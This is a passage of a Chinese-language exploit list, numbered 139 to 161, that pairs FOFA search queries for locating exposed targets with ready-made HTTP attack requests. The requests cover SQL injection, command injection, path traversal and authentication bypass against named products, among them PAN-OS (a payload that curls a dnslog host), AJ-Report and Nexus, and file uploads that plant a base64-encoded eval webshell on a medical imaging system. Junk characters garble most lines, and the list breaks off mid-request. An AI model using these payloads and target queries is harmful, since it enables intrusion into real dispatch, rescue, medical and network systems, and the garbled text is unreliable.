139. 福建科立讯通信指挥调度平台editemedia.php sql注入
1 c9 U5 c- z; |# qCVE-2024-26223 X! Y# V! x$ X: X6 j
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
" j9 v6 c/ N' i' ?GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
7 `4 }1 ^0 t" O' {4 _4 HHost: x.x.x.x, P: c! U( n* E6 t; A8 U% D' T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
5 G( u8 V2 Y2 O/ I" p I4 QAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
1 z' m; j5 p" m3 ]/ w6 @3 xAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2$ I6 U& s1 ~, @0 c& i: {
Accept-Encoding: gzip, deflate, br
* W# x! k" I- v* ]3 jConnection: close
* k8 A5 `2 U- Y- n$ uCookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk& H2 Q9 m5 v y) {9 _& F
Upgrade-Insecure-Requests: 1
# b4 A9 b/ T5 W% t0 G# _% K5 @. c. M& x& \) |" }* i
4 c: L, J) p" O; }9 g: r- m140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
* s& G) m0 f6 {. KCVE-2024-2566) r0 \! A3 w9 R) p* E9 W0 k
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"3 Q4 D$ P0 }2 m) I1 T- i- G- e
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.1
+ g9 w/ `: ^# {* ?' |Host: x.x.x.x; Z2 z) m3 b# F5 c. ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
0 N' f; |1 }0 UAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
" t! ^/ b/ b( w. q' P7 bAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2! e8 `4 ^& C% c/ @9 w& c* m
Accept-Encoding: gzip, deflate, br) l: U+ n. G4 a
Connection: close
- e4 Q$ Z/ P( L" z# `Cookie: authcode=h8g9& m. f4 f$ b. {- {& D2 N* @+ j3 D
Upgrade-Insecure-Requests: 1% \' `" r# u; A6 n% u4 T+ f' s1 p
5 W" i8 V, ~8 |) r
$ Q' _; y' ~7 C' Z9 T* o1 J141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
: O* Q+ W1 R# Z9 p* I$ QFOFA:body="指挥调度管理平台"% c! `& `: e: R/ F. [9 u. m
POST /app/ext/ajax_users.php HTTP/1.1; c; o7 p: Y0 Y
Host: your-ip
( K0 s: ~4 i0 D2 R' }4 o( iUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
( a3 W# b( ^3 vContent-Type: application/x-www-form-urlencoded0 t0 }/ j6 G9 |% @& |
" Y( b6 H) A. n( ^. u
9 a, A8 N4 c8 W8 x/ v; Qdep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -
& R% C; c7 G- i9 o. J! `3 q) p9 x+ U8 Q
* e$ y! t) K0 l9 x3 o6 M
142. CMSV6车辆监控平台系统中存在弱密码! r, V+ M T/ F5 J8 H% P" w
CVE-2024-29666
$ n; F. Q% `! _; X. \) m# Q: ~8 MFOFA:body="/808gps/", z& I0 l; l% Z. s: f5 p: G7 e
admin/admin
$ f2 R* E# @+ ]9 F' _. [; `143. Netis WF2780 v2.1.40144 远程命令执行0 j3 G8 K- s, n0 s3 O/ }8 V( a
CVE-2024-25850
; F& {) q5 O& F" u; w( vFOFA:title='AP setup' && header='netis'
4 u# a4 L3 p% UPAYLOAD
: Q+ C. m D: @, m. {, S, n6 t- d
144. D-Link nas_sharing.cgi 命令注入
2 S/ z7 `0 ^+ |( vFOFA:app="D_Link-DNS-ShareCenter"% X) h- y7 _" Q, V7 _
system参数用于传要执行的命令( c$ G. d; H, [" e; K; J* v3 ]/ Z/ T2 ]
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
( [5 x; G5 M7 T6 b- |! x- sHost: x.x.x.x$ ~; W% \/ l0 I" b
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.08 n) z% r/ U: N5 P* |: f9 g; \
Connection: close
, X& n0 ]( _3 y+ V2 eAccept: */*
$ l m& }; ^, g" rAccept-Language: en4 c8 B" n" ~5 y" }* X0 R
Accept-Encoding: gzip3 j' | C3 U) @3 F
$ a J. [7 x6 T- m' M1 _- A
7 u! \' H5 k+ U, d0 x9 ]- L: {+ F! y- b145. Palo Alto Networks PAN-OS GlobalProtect 命令注入# }# W- O0 H7 \( C. t% P' w" r% H
CVE-2024-3400
9 u) m, Q2 M# X/ T vFOFA:icon_hash="-631559155". |" M4 t8 ?8 G6 `8 E* i6 `
GET /global-protect/login.esp HTTP/1.13 K" e6 I6 i# u1 J1 {2 _
Host: 192.168.30.112:10059 ]! j4 y+ Y4 p2 i* u( l
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
s( G( v$ L. [Connection: close: g# }% @: {5 n6 s- ]& K3 W
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
- f2 ]6 n# ~/ j) q% y) Q. C$ h. ^9 JAccept-Encoding: gzip
9 x& v* ~+ T! p! r4 t) d; n- ?. l) p/ E) |% m
4 G! d9 ]3 c$ {$ d( }# S8 p. C
146. MajorDoMo thumb.php 未授权远程代码执行1 ?, L. C* s* q1 Z2 x
CNVD-2024-02175
. r# A, G7 p) Z, W% HFOFA:app="MajordomoSL"4 S/ R# z5 O( L, i; ]1 F; ?
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
: w$ f- f" [ n+ pHost: x.x.x.x
# b) [4 i! m% f$ t1 f+ l! rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
& G: P, G7 {. O! R/ ZAccept-Charset: utf-8
_/ E4 f; w+ q l+ k' `Accept-Encoding: gzip, deflate3 T! O l! f; k; F
Connection: close
/ A( V2 o# B3 ]) i. x7 R0 _8 P" p" y+ r& B
& k8 i( K: J. J! ?+ @$ V% l
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历7 F& t# d. e2 [
CVE-2024-323990 q1 ~: F; f* z
FOFA:body="RaidenMAILD"3 l# |4 D5 e0 f8 x! W( ]; o; _& I
GET /webeditor/../../../windows/win.ini HTTP/1.1) j3 C. k( q% {% _ D, d5 f
Host: 127.0.0.1:81
- Z+ h: A* X: `Cache-Control: max-age=06 M2 g7 x4 N+ m- O5 q1 N
Connection: close3 h' w( M& ?+ P2 U
5 } ~! p3 f6 ^; o
4 e3 K( A7 V: \5 ?7 j
148. CrushFTP 认证绕过模板注入' @& p' U7 n9 w4 N1 H: }8 Z2 V7 J
CVE-2024-4040
; [# Y% j5 x$ G, EFOFA:body="CrushFTP"/ t# M- j9 A! G" _: H
PAYLOAD
' t1 a8 ]; J& d+ P3 w: _8 `8 L5 y6 Q, c1 |
149. AJ-Report开源数据大屏存在远程命令执行
( r q9 V/ s4 y- T2 gFOFA:title="AJ-Report"& d( p( }) s4 y5 K* h
4 V5 W. X- ~# |
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
2 m. h$ {! H0 ZHost: x.x.x.x, c$ G0 V- M6 b& s& N3 A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.361 G% v7 F6 _& O: O: s5 r
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
) G$ A7 B( L8 X# v* \- dAccept-Encoding: gzip, deflate, br
2 o& h/ ]% G8 A" D5 C, K2 O" VAccept-Language: zh-CN,zh;q=0.9
) V! {/ ^- \8 z8 s3 _: ?" VContent-Type: application/json;charset=UTF-8
5 t! W1 E0 Z) B2 f, ^* E0 WConnection: close
6 y9 W6 h' d4 q- p
$ x% r9 ]* n- B. E6 F/ j+ ~' @2 P{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}8 j3 `- e+ h# U, n* u0 k
4 f1 K8 l0 Y) [, F
150. AJ-Report 1.4.0 认证绕过与远程代码执行
`8 w" W |/ k5 b5 YFOFA:title="AJ-Report"
% {( |" m; m# dPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1; s5 w6 o! u+ r' |
Host: x.x.x.x4 [9 n* I7 X h. \1 T6 G* t5 @
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
) s. x6 [4 z- U2 d1 \4 ]7 qAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.79 s n4 I3 n# c' f0 V7 z4 V
Accept-Encoding: gzip, deflate, br
* {( Q( I. g" Z$ @; K9 v: k: o" NAccept-Language: zh-CN,zh;q=0.99 R, a* R; q8 J2 g; R& s' r, N. L
Content-Type: application/json;charset=UTF-8
, ~- i" \4 i( y7 o) [2 U: V* C* yConnection: close7 |2 T; Z* R: s3 n- u4 \6 Q
Content-Length: 3398 ~* A' M, K; K6 O
/ {% ^7 @% y E
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}2 R8 C9 E7 N! E# {2 {6 H
$ ]9 j1 l0 j9 `$ C3 m. W/ ~% f3 D z- _ v+ E% M1 W
151. AJ-Report 1.4.1 pageList sql注入
; x# V( k9 Q& Q4 t2 g( o% UFOFA:title="AJ-Report"& k! o" ^/ C* @6 J, z
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
% y5 T6 I9 i. ~2 E `' g6 @1 wHost: x.x.x.x
$ w& t3 Z/ C& S3 V3 f5 D( YUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.150 V7 m/ o. g$ M
Connection: close' R7 a/ x5 `: l" Q1 E" X8 p
Accept-Encoding: gzip# [4 F9 q) u- L/ [
* b% \: l9 C- `+ w8 g
9 U& ?* @2 i. p/ u
152. Progress Kemp LoadMaster 远程命令执行; d$ T8 t& z. b
CVE-2024-1212
# `" |, r4 f) w- I k7 {; ^LoadMaster <= 7.2.59.2 (GA)* P0 G. e/ p c: G9 M( P
LoadMaster<=7.2.54.8 (LTSF)
. B; ?8 K0 s3 \/ M! {8 X2 @9 CLoadMaster <= 7.2.48.10 (LTS)/ R8 g4 H; S+ _. E; T4 o' Y3 m
FOFA:body="LoadMaster"
3 k9 H, u5 G, r0 M; Q$ U' p5 h2 @; hJztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码& j! u1 q8 t3 Y! L, @8 g6 e
GET /access/set?param=enableapi&value=1 HTTP/1.1% K$ B4 q+ P; Q$ e" O6 @- _& r8 l% o# |
Host: x.x.x.x
t- M* z( x8 mUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
- p' O+ a. A* l, \( H- N1 G& lConnection: close' W O3 l6 w+ g
Accept: */*( u. _9 k( \1 M' y
Accept-Language: en b2 x% g* ~% B
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=0 L' Q1 ~7 ]! Q$ \+ }, o( |7 a+ |7 L
Accept-Encoding: gzip y+ V, [6 [( A
- F$ U2 e$ Z0 m6 a, R7 G
1 m5 ]9 e' v+ j4 u6 D153. gradio任意文件读取" T/ i, g+ Y" H
CVE-2024-1561FOFA:body="__gradio_mode__": I" c" w; J) n( W' M D3 X0 g
第一步,请求/config文件获取componets的id
: r6 U6 M7 Y$ G& dhttp://x.x.x.x/config% z9 `+ ? H' t* e, I1 I
! c, |% e( V! t% o
# W. y. e" H* s第二步,将/etc/passwd的内容写入到一个临时文件, k4 {4 g1 C \8 n
POST /component_server HTTP/1.1! g8 m2 O2 u; r. \* I. q5 a
Host: x.x.x.x" E. P" O$ |6 l; X: V+ \
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
& S: j) g3 x0 h$ SConnection: close
) q" F6 ]' K" n/ O1 TContent-Length: 115
# Y, B- a0 R- v# t" ~" gContent-Type: application/json& n7 M* w5 R7 Y3 A
Accept-Encoding: gzip
) y0 Q( C6 t& q" B
( q! r! r* n8 d{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}
' @- C e; j/ }# [' W. K% g6 G0 p$ I3 R
7 j/ i; H M( O6 w第三步访问& D+ y0 R6 T8 `- Y. V
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd+ ]: V. h, g0 z* _3 ?0 o
, P& X# }7 H# Q' [; e/ B/ Q( Q" M8 {1 r( {# }( ]
154. 天维尔消防救援作战调度平台 SQL注入2 p" Q9 q% f! K
CVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
6 }7 |" E* D/ OPOST /twms-service-mfs/mfsNotice/page HTTP/1.1! V4 F0 i, ]' P* J$ j
Host: x.x.x.x& J0 O1 }+ o w' D( e+ C0 W
Content-Length: 106* Y5 F! i- H0 @9 N7 k _# ]; v& F
Cache-Control: max-age=0( O3 p L% C4 ]3 R2 L+ j* `
Upgrade-Insecure-Requests: 16 H8 `: G1 k5 p/ L( T+ t
Origin: http://x.x.x.x
% t" j) E# O4 d7 x$ [2 ]Content-Type: application/json
/ i t, D' S: U/ fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
2 M/ |9 C' Y5 x+ w5 A, aAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7; A0 t, P1 l T( o- l% f
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page) M5 W; ^9 @3 z9 O
Accept-Encoding: gzip, deflate
! O) w5 w' g/ N7 N! QAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
8 V' ^) z9 L* gConnection: close
. W1 W1 }+ K2 z7 w' e- |1 X* ]$ B9 t$ G6 n/ A0 p
{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}- s- u4 d" L6 n6 @, W# t, d8 {
' g k! O+ a2 b: W2 @
4 N& ?+ X4 G4 Y* B155. 六零导航页 file.php 任意文件上传
, G5 t9 t' }8 |! v1 ^% ZCVE-2024-34982/ |% d; u! B! E! a
FOFA:title=="上网导航 - LyLme Spage"
" Y( g/ L a2 N, IPOST /include/file.php HTTP/1.1
1 j8 b, w1 z; Z) {& V; Z. jHost: x.x.x.x
& S& S4 }; N# q8 I6 A) g3 d; GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.01 l5 v* G. e) y6 x1 d: l
Connection: close
' F: G* t) f. R7 ` PContent-Length: 2325 V+ J# w0 N) i: L( y/ m" N& I& C
Accept: application/json, text/javascript, */*; q=0.01+ U* @4 ?1 U9 k' c& Y% W2 I2 h
Accept-Encoding: gzip, deflate, br
8 d# f% {$ o- y: F8 ~5 m1 RAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+ s: s2 H* x, @5 p9 K* _0 ^ yContent-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
b- h" r$ m6 t, B3 mX-Requested-With: XMLHttpRequest
- [8 I3 A1 ^$ Y4 P- _) v- v3 Q, C; Y# @: u" t0 _! a
-----------------------------qttl7vemrsold314zg0f
$ p0 x5 L3 D& N# b. HContent-Disposition: form-data; name="file"; filename="test.php"
3 L2 F x N9 L1 O1 o# m4 zContent-Type: image/png
" H. T( D3 m P2 f0 z8 D) n; e/ N8 g6 A0 U8 S6 j
<?php phpinfo();unlink(__FILE__);?>
9 N6 k; X* C; Z; I. h/ e-----------------------------qttl7vemrsold314zg0f--+ t5 c6 f4 l: n
" v& e8 n; F7 I
1 s1 s0 c7 r! S0 m9 L访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php
+ K; I/ Q$ g( o2 o, _% k$ U# m# y& Q1 g- e4 Y
156. TBK DVR-4104/DVR-4216 操作系统命令注入
7 f4 M9 ]: }$ ]CVE-2024-3721
# V( I0 a, F+ J: S9 v8 KFOFA:"Location: /login.rsp"; @5 c0 w/ u! K- s
·TBK DVR-4104# Z/ P1 [/ `# G) ]9 _8 W* u
·TBK DVR-42167 v* ]$ S" v4 p5 I
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"
7 }& ]1 q6 x2 m
4 m' p8 Y2 T6 b' y3 ~5 [9 X. ?/ ]1 M! p: P4 a/ j9 a! V
POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
, Y$ h# V {) \/ XHost: x.x.x.x' [: A J ^' U3 v3 ~$ J, b4 i
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15, X3 l1 f9 f3 v4 T3 H& o* [3 S
Connection: close
% w X; k! i* N9 t; j/ s, AContent-Length: 0
2 P9 k3 F* q: ^* f1 p) e$ ?Cookie: uid=1
5 W5 W E5 G5 P& }* y! x: {9 ~Accept-Encoding: gzip
5 u- Y, ]* w: T9 S+ B3 p$ N
9 S3 \1 E6 ]9 A6 ^4 x7 k9 Z _. ~: T, g7 b, a+ ?" z( W; Z4 k
157. 美特CRM upload.jsp 任意文件上传
]# s7 p1 ?6 S0 J( o) qCNVD-2023-06971
' M0 M1 r6 p3 E6 |4 D k7 OFOFA:body="/common/scripts/basic.js"
9 U0 s5 g" l& X8 g% xPOST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
- k# t( ^6 V! W1 `. H2 LHost: x.x.x.x
( n9 d' l/ L6 v( z' RUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
* k- a" ]( z+ pContent-Length: 709
# w2 U$ {$ v- Q9 h+ m6 nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
3 ?* @- v* o- p( dAccept-Encoding: gzip, deflate3 J9 w7 x4 S1 S# D: E6 Q: |# h
Accept-Language: zh-CN,zh;q=0.91 ]# q; ~' ^( G# ?
Cache-Control: max-age=0
, a- s/ x4 t. VConnection: close0 H5 z! _) |- R8 w% ?! \& P
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
. s/ b {2 P3 vUpgrade-Insecure-Requests: 1% x( s6 N% ^7 R1 G( Z+ I
7 z3 ^- `6 z' u, m; G9 |" V
------WebKitFormBoundary1imovELzPsfzp5dN
j$ M1 p, I' K7 P! L) UContent-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
9 c% u) \! K$ }9 o' ^: hContent-Type: application/octet-stream8 q% G6 o4 W, ^" r' p% i
4 b* s! i1 l7 G) G$ M# H
nyhelxrutzwhrsvsrafb
- X+ w/ K2 T: i) [" w7 y------WebKitFormBoundary1imovELzPsfzp5dN
' ^: a# {! x# C- S* ^* MContent-Disposition: form-data; name="key"& f! I: y j, d m/ C
! Q7 V+ m5 G5 L, E+ \2 F
null
h5 ~0 K5 G, Y$ g------WebKitFormBoundary1imovELzPsfzp5dN5 L, ^2 R9 T+ y+ c: q; f! A
Content-Disposition: form-data; name="form"2 e n) ]. u' t% @4 l) @
% V* L V$ W2 m% Znull9 T1 |3 c4 v Z+ w L
------WebKitFormBoundary1imovELzPsfzp5dN
2 k6 R/ Q& Z" n8 P& C' X7 rContent-Disposition: form-data; name="field"
; c9 x/ o8 v& c9 p. }- R6 s: [5 L- m$ J7 q7 u ~+ D. w7 g
null
% j2 d# S0 N0 T. k$ {/ i, U------WebKitFormBoundary1imovELzPsfzp5dN
: Y+ T, s4 }6 d# g {/ \$ yContent-Disposition: form-data; name="filetitile", b7 _0 S( i2 g- F9 b9 K
1 Q! }- H; E- A' L8 [) A
null2 N5 L/ v( ^8 k5 m) y! d; F
------WebKitFormBoundary1imovELzPsfzp5dN
% c" H& V- v$ p. v$ B5 [) dContent-Disposition: form-data; name="filefolder"+ a4 [! A2 X0 q
- M- g2 }1 o" ^0 Z+ x" B8 _
null
' s4 |& x, \3 X4 a; D) Y2 o------WebKitFormBoundary1imovELzPsfzp5dN--
# m$ T; y/ \3 z" b
- O! w# @' F) L8 i. z( c; {
! C! f: W( w6 {http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp
/ j/ h) |, w8 N$ h3 o* w$ B9 ]; d- f* \& u4 T& K) A
158. Mura-CMS-processAsyncObject存在SQL注入
/ U D* n/ Y; |! v+ ~3 Q) fCVE-2024-32640
y3 t, Q' |1 @; }: q9 L0 KFOFA:"Generator: Masa CMS"8 {0 D8 z9 {5 y
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
& h E& k: B/ I2 K7 n5 W/ LHost: {{Hostname}}0 @( r8 w' s: i! W/ h/ m
Content-Type: application/x-www-form-urlencoded6 _) E2 K6 v- H, F
5 D: F$ o+ l0 r% n$ i4 _) ?5 Lobject=displayregion&contenthistid=x\'&previewid=1/ }6 y) @$ N/ S8 ]; r( h
/ Z4 M4 K0 h, T4 m: V
9 r# Y7 H, W- I# z3 ?3 [: t
159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传
1 ^* n1 o0 S# p3 MFOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928"). b) U8 f7 H- R' A, Q) j9 H
POST /webservices/WebJobUpload.asmx HTTP/1.1# B5 y" Y+ H( d! q9 j9 U; G( s
Host: x.x.x.x6 {* K: P8 i+ r! ?+ H4 W# O: |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
: `" W0 }; J: a1 D& {* c4 L1 JContent-Length: 1080
/ d% A5 x2 Y. R1 {Accept-Encoding: gzip, deflate
' v* c$ @$ ?1 v0 UConnection: close
- A9 b- a8 P# k7 @, A4 _7 [8 B/ IContent-Type: text/xml; charset=utf-8$ q+ J. N* u( ]! m" m( C6 O
Soapaction: "http://rainier/jobUpload"
) H; d3 w) a$ s' i# L6 Y" @ [. o3 s; [8 [
<?xml version="1.0" encoding="utf-8"?>
3 {2 p0 A4 F+ T+ i E- n. x<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
4 h1 A3 R0 Y5 a4 Q! a4 c<soap:Body>
* g/ d# G0 R' J, }; i: o<jobUpload xmlns="http://rainier">9 ^# a B& D5 m
<vcode>1</vcode>* q: p9 E) h2 L! G6 q3 h2 q' b
<subFolder></subFolder>
: S' ~" I+ O. ^5 p+ h6 @<fileName>abcrce.asmx</fileName>! r6 Y$ x% V# V" g: A7 I' U4 ` p- y {
<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>7 j" O" n# B. Z, t& v
</jobUpload>
, S7 m7 i9 {4 g7 H& c</soap:Body>: R3 s8 [+ ?/ {3 M$ o6 o
</soap:Envelope>! g$ K4 q m* i& Y7 q% O! ?8 |
6 U" L: E0 |1 @% ^+ N. g
$ c$ j/ A: D) H+ v% v/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")0 `; K2 x$ ]1 C( B- G6 B
( C- L) l0 a5 p+ M" @3 F& j% l
2 I0 m, ?" X4 @! t& J3 r2 i2 Y160. Sonatype Nexus Repository 3目录遍历与文件读取
. R. Z8 Z; `) Z bCVE-2024-4956
2 A! d1 V1 D5 R6 FFOFA:title="Nexus Repository Manager"
6 M6 g1 u& g: P$ W9 X. K+ ~2 pGET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
# f% `/ _* u5 \3 z' wHost: x.x.x.x+ p6 Q4 }7 Y( ?; t6 R& `
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
! j+ e) m- g/ Q2 p' \$ w# }Connection: close$ E* M5 w7 n: `; y5 O U
Accept: */*" Y+ ?, b$ \: n
Accept-Language: en% s0 \% F. z: A9 _% A L
Accept-Encoding: gzip
. J6 ]2 }6 z9 k$ V. w6 T& h; E" ]/ g9 d; j5 H
# m: e5 K7 i e9 l9 u
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
; N. F2 i. S$ \; \* G) M; @FOFA:body="/KT_Css/qd_defaul.css"0 t9 T* @& ^& u+ W
第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密7 O: {6 B. U& n1 R3 j
POST /Webservice.asmx HTTP/1.1
- U, ?: L5 S$ _Host: x.x.x.x
( \- A1 t8 U2 A. mUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.360 @3 G# H4 l/ k8 B! w% B
Connection: close# J7 ~0 F4 R) Z$ _
Content-Length: 445 ?* V* h g1 |+ q/ L3 `" _
Content-Type: text/xml" i6 K$ H' F/ w0 J/ `
Accept-Encoding: gzip
# a* J/ k B+ ~- x0 `5 y7 d: v9 s
. [( V7 i1 W9 b7 i) U2 C6 U<?xml version="1.0" encoding="utf-8"?>
4 X1 \' K9 U7 _ p- K& n6 O<soap:Envelope xmlns:xsi="8 H7 C' |$ B) o! N9 [7 C; N
http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"
6 W. i- U2 F' v% d) A9 Kxmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
